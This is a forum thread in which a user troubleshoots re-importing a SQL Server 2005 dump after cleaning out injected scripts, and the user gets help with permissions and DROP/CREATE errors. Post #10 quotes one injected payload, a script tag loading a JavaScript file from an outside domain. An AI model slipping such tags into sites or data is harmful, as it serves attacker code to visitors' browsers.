Page 1 of 2 12 LastLast
Results 1 to 15 of 16

Thread: Database Import Error

  1. #1
    Join Date
    Nov 2011
    Posts
    9

    Database Import Error

    I am getting an error during importing of database using Web Data Administrator as follows:

    There was an error importing the database. The status of import is unknown. Incorrect syntax near ">>".

    Well, I have checked my database and there is no any ">>" syntax at all.

    Then, I have tested the system by exporting current database from system and importing without openning it. I am getting same error!

    Can I get help?

  2. #2
    Join Date
    Nov 2002
    Location
    New Jersey, USA
    Posts
    3,922
    Is it related to SQL Server?. Never heard of Web Data Administrator.

  3. #3
    Join Date
    Nov 2011
    Posts
    9
    Yes, Microsoft SQL Server 2005 has been used and for web application "Web Data administrator" is used. "Web Data Administrator" is a program as "PhpMyAdmin". You are able to export / import database.

    My problem in here is during the import database from my PC to Web Data Administrator, I am getting syntax error ">>";on the other hand, I do not have such a syntax in my database which I am trying to import.

    Is there any other way I could import my database into the system?

  4. #4
    Join Date
    Sep 2002
    Posts
    5,938
    Where do you like to import db to?

  5. #5
    Join Date
    Nov 2011
    Posts
    9
    Well, I do not have that much information in MS SQL.

    I have a sql database named "DB080701104333P" in MSSQL 2005. And I am trying to upload same database "DB080701104333P" with corrected one from my PC to MSSQL 2005.

    I have tryied it by using "Web Data Administrator", but I am getting error. Therefore, I am looking for an alternative solution.

  6. #6
    Join Date
    Sep 2002
    Posts
    5,938
    To overwrite db on server, you can backup db on your pc then restore it on sql2k5 server.
    To copy some data only, you can try with ssis package.

  7. #7
    Join Date
    Nov 2011
    Posts
    9
    I have exported database from MS SQL Server 2005 by using "Web Data Administrator" web application. I opened it and cleaned / removed unwanted injected scripts by intruders.

    Now, I want to upload this clean database into the MS SQL Server 2005.

    I have installed "SQL Server Management Studio Express" but I could not find upload option from PC to server.

    Could you direct me how to do it?

  8. #8
    Join Date
    Sep 2002
    Posts
    5,938
    Which edition of sql2k5 do you have? Express edition doesn't come with data import tool, can try with bcp instead. Or try with regular ssms.

  9. #9
    Join Date
    Nov 2011
    Posts
    9
    Can I upload my database "final.sql" by using Microsoft Visual Studio 2010?

  10. #10
    Join Date
    Nov 2011
    Posts
    9
    I have exported database "final.sql" into my pc and opened it by Microsoft Visual Studio 2010 Professional.

    My scripts inside of " final.sql" are such as:


    /* Generated by Web Data Administrator on 25.10.2011 08:02:08 */

    /* Options selected: database drop-commands table-schema table-data stored-procedures comments */

    /****** Object: Database DB080701104333P0 Script Date: 25.10.2011 08:02:08 ******/
    IF EXISTS (SELECT name FROM master.dbo.sysdatabases WHERE name = N'DB080701104333P0')
    DROP DATABASE [DB080701104333P0]
    GO

    CREATE DATABASE [DB080701104333P0] ON (NAME = N'DB080701104333P0Data', FILENAME = N'D:\MSSQL\DATA\DB080701104333P0Data.mdf' , SIZE = 4, MAXSIZE = 50, FILEGROWTH = 1) LOG ON (NAME = N'DB080701104333P0Log', FILENAME = N'D:\MSSQL\DATA\DB080701104333P0Log.ldf' , SIZE = 1, MAXSIZE = 25, FILEGROWTH = 10%)
    COLLATE Turkish_CI_AS
    GO

    exec sp_dboption N'DB080701104333P0', N'autoclose', N'false'
    GO
    .....


    Right after

    INSERT [ILAN] ([ID], [URUN_ADI_TR], [URUN_ADI_EN], [URETIM_YILI], [TEKNIK_OZ_TR], [TEKNIK_OZ_EN], [AKSESUAR_TR], [AKSESUAR_EN], [ALTKATID], [UYEID], [OLUSTURMA_TARIHI], [GUNCELLEME_TARIHI], [ILAN_BASTAR], [ILAN_BITTAR], [TIKLAMA], [ILAN_ODEME_ID], [DURUM], [ENG_GOSTERIM], [TRGOSTERIM]) VALUES (37, 'GOODWAY BH-65 ÇUBUK SÜRÜCÜ EN


    I have found some injected scripts in it:

    </title><script src=http://nbnjki.com/urchin.js ></script>',


    I have removed them from "final.sql" and want to upload it to the server back.

    I am able to connect to my database by Microsoft Visual Studio 2010 Professional. But I do not know how to upload "final.sql" back to the server.

  11. #11
    Join Date
    Sep 2002
    Posts
    5,938
    Open query window then execute that sql script.

  12. #12
    Join Date
    Nov 2011
    Posts
    9
    I have opened query window then executed that sql script.

    I am getting the following error:

    Msg 3702, Level 16, State 3, Line 7
    Cannot drop database "final" because it is currently in use.
    Msg 262, Level 14, State 1, Line 2
    CREATE DATABASE permission denied in database 'master'.

    Which steps I should take?

  13. #13
    Join Date
    Sep 2002
    Posts
    5,938
    You need connect to sql with sysadmin rights. For the db, can leave it and modify your script to create db with new name. After closing user sessions to existing db, you can either drop it or rename it. Then rename new db to final.

  14. #14
    Join Date
    Nov 2011
    Posts
    9
    Thank you very much.

    I had "DROP" and "CREATE" commands in my sql, and I have removed them from script. Then, I have execute it by using Microsoft SQL Management Studio Express. It works!

  15. #15
    Join Date
    Nov 2011
    Posts
    1
    one of the problem with DataBase replication http://www.youtube.com/watch?v=R-WceyM7BD0

Posting Permissions

  • You may not post new threads
  • You may not post replies
  • You may not post attachments
  • You may not edit your posts
  •